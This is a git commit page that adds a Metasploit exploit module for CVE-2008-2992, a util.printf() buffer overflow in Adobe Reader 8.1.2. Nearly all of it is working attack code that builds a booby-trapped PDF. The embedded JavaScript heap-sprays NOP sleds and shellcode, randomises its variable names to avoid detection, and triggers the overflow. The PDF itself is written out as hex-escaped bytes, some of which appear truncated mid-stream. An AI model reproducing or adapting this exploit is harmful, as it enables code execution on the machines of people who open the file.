added exploit module adobe_utilprintf.rb
git-svn-id: file:///home/svn/framework3/trunk@5995 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
a8c9397419
commit
381f6da682
|
@ -0,0 +1,163 @@
|
|||
###
|
||||
## This file is part of the Metasploit Framework and may be subject to
|
||||
## redistribution and commercial restrictions. Please see the Metasploit
|
||||
## Framework web site for more information on licensing and terms of use.
|
||||
## http://metasploit.com/projects/Framework/
|
||||
###
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe util.printf() Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
|
||||
< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
|
||||
entry, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC' ],
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-2992' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Adobe Reader v8.1.2', { 'Ret' => '' } ],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 8 2008',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Make some nops
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
|
||||
# Randomize PDF version?
|
||||
ver = 1 + rand(2)
|
||||
|
||||
build = 1 + rand(7)
|
||||
|
||||
x = ver.to_s + "." + build.to_s
|
||||
|
||||
# Randomize variables
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(rand(100) + 1)
|
||||
rand5 = rand_text_alpha(rand(100) + 1)
|
||||
rand6 = rand_text_alpha(rand(100) + 1)
|
||||
rand7 = rand_text_alpha(rand(100) + 1)
|
||||
rand8 = rand_text_alpha(rand(100) + 1)
|
||||
rand9 = rand_text_alpha(rand(100) + 1)
|
||||
rand10 = rand_text_alpha(rand(100) + 1)
|
||||
rand11 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
script = %Q|
|
||||
var #{rand1} = unescape("#{shellcode}");
|
||||
var #{rand2} ="";
|
||||
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
|
||||
#{rand4} = #{rand2} + #{rand1};
|
||||
#{rand5} = unescape("#{nops}");
|
||||
#{rand6} = 20;
|
||||
#{rand7} = #{rand6}+#{rand4}.length
|
||||
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
|
||||
#{rand8} = #{rand5}.substring(0, #{rand7});
|
||||
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
|
||||
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
|
||||
#{rand10} = new Array();
|
||||
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
|
||||
util.printf("%45000.45000f", 0);
|
||||
|
|
||||
|
||||
# Create the pdf
|
||||
pdf = "\x25\x50\x44\x46\x2d" + x + "\x0a\x0a\x31\x20\x30\x20\x6f\x62"
|
||||
pdf << "\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x43\x61\x74"
|
||||
pdf << "\x61\x6c\x6f\x67\x0a\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20"
|
||||
pdf << "\x32\x20\x30\x20\x52\x0a\x20\x2f\x50\x61\x67\x65\x73\x20\x33\x20"
|
||||
pdf << "\x30\x20\x52\x0a\x20\x2f\x4f\x70\x65\x6e\x41\x63\x74\x69\x6f\x6e"
|
||||
pdf << "\x20\x37\x20\x30\x20\x52\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a"
|
||||
pdf << "\x0a\x0a\x32\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54"
|
||||
pdf << "\x79\x70\x65\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x0a\x20\x2f"
|
||||
pdf << "\x43\x6f\x75\x6e\x74\x20\x30\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62"
|
||||
pdf << "\x6a\x0a\x0a\x33\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f"
|
||||
pdf << "\x54\x79\x70\x65\x20\x2f\x50\x61\x67\x65\x73\x0a\x20\x2f\x4b\x69"
|
||||
pdf << "\x64\x73\x20\x5b\x34\x20\x30\x20\x52\x5d\x0a\x20\x2f\x43\x6f\x75"
|
||||
pdf << "\x6e\x74\x20\x31\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
|
||||
pdf << "\x34\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70"
|
||||
pdf << "\x65\x20\x2f\x50\x61\x67\x65\x0a\x20\x2f\x50\x61\x72\x65\x6e\x74"
|
||||
pdf << "\x20\x33\x20\x30\x20\x52\x0a\x20\x2f\x4d\x65\x64\x69\x61\x42\x6f"
|
||||
pdf << "\x78\x20\x5b\x30\x20\x30\x20\x36\x31\x32\x20\x37\x39\x32\x5d\x0a"
|
||||
pdf << "\x20\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x20\x30\x20\x52"
|
||||
pdf << "\x0a\x20\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x20\x3c\x3c\x0a"
|
||||
pdf << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x50\x72"
|
||||
pdf << "\x6f\x63\x53\x65\x74\x20\x5b\x2f\x50\x44\x46\x20\x2f\x54\x65\x78"
|
||||
pdf << "\x74\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
|
||||
pdf << "\x2f\x46\x6f\x6e\x74\x20\x3c\x3c\x20\x2f\x46\x31\x20\x36\x20\x30"
|
||||
pdf << "\x20\x52\x20\x3e\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
|
||||
pdf << "\x20\x20\x3e\x3e\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
|
||||
pdf << "\x35\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x20\x2f\x4c\x65\x6e\x67"
|
||||
pdf << "\x74\x68\x20\x35\x36\x20\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a"
|
||||
pdf << "\x42\x54\x20\x2f\x46\x31\x20\x31\x32\x20\x54\x66\x20\x31\x30\x30"
|
||||
pdf << "\x20\x37\x30\x30\x20\x54\x64\x20\x31\x35\x20\x54\x4c\x20\x28"
|
||||
pdf << "\x65"
|
||||
pdf << "\x61\x6d\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x36\x20\x30\x20\x6f"
|
||||
pdf << "\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x46\x6f"
|
||||
pdf << "\x6e\x74\x0a\x20\x2f\x53\x75\x62\x74\x79\x70\x65\x20\x2f\x54\x79"
|
||||
pdf << "\x70\x65\x31\x0a\x20\x2f\x4e\x61\x6d\x65\x20\x2f\x46\x31\x0a\x20"
|
||||
pdf << "\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x20\x2f\x48\x65\x6c\x76\x65"
|
||||
pdf << "\x74\x69\x63\x61\x0a\x20\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20"
|
||||
pdf << "\x2f\x4d\x61\x63\x52\x6f\x6d\x61\x6e\x45\x6e\x63\x6f\x64\x69\x6e"
|
||||
pdf << "\x67\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x37\x20\x30"
|
||||
pdf << "\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f"
|
||||
pdf << "\x41\x63\x74\x69\x6f\x6e\x0a\x20\x2f\x53\x20\x2f\x4a\x61\x76\x61"
|
||||
pdf << "\x53\x63\x72\x69\x70\x74\x0a\x20\x2f\x4a\x53\x20\x28"
|
||||
pdf << script
|
||||
pdf << "\x0a\x0a\x0a"
|
||||
pdf << "\x29\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x78\x72\x65"
|
||||
pdf << "\x66\x0a\x30\x20\x38\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
|
||||
pdf << "\x20\x36\x35\x35\x33\x35\x20\x66\x0a\x30\x30\x30\x30\x30\x30\x30"
|
||||
pdf << "\x30\x31\x30\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30"
|
||||
pdf << "\x30\x30\x30\x30\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30"
|
||||
pdf << "\x30\x30\x30\x30\x30\x30\x31\x34\x37\x20\x30\x30\x30\x30\x30\x20"
|
||||
pdf << "\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x32\x30\x38\x20\x30\x30\x30"
|
||||
pdf << "\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x34\x30\x30\x20"
|
||||
pdf << "\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x35"
|
||||
pdf << "\x30\x37\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30"
|
||||
pdf << "\x30\x30\x36\x32\x31\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x74\x72"
|
||||
pdf << "\x61\x69\x6c\x65\x72\x0a\x3c\x3c\x0a\x20\x2f\x53\x69\x7a\x65\x20"
|
||||
pdf << "\x38\x0a\x20\x2f\x52\x6f\x6f\x74\x20\x31\x20\x30\x20\x52\x0a\x3e"
|
||||
pdf << "\x3e\x0a\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0a\x33\x36\x32\x39"
|
||||
pdf << "\x0a\x25\x25\x45\x4f\x46\x0a"
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue